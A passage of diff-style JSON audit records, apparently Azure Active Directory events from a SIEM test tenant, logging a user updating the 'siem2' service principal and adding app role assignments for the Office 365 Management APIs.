"2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2595378Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620448"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "99a3d3e3-e4f6-4de7-96e0-6333564e1b25"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "", "OldValue": "", "Name": "Included Updated Properties"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2595378Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620448"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "99a3d3e3-e4f6-4de7-96e0-6333564e1b25"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8071361Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622707"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "256e3859-87ca-4b23-b2c0-45a26ccd7925"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8821342Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622751"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "411fc666-cabf-4cb0-b8a3-e5a2cc515b79"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.9571526Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622781"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a4a12952-3467-4d48-9950-48b4b9ac87b3"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8821342Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622751"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "411fc666-cabf-4cb0-b8a3-e5a2cc515b79"}
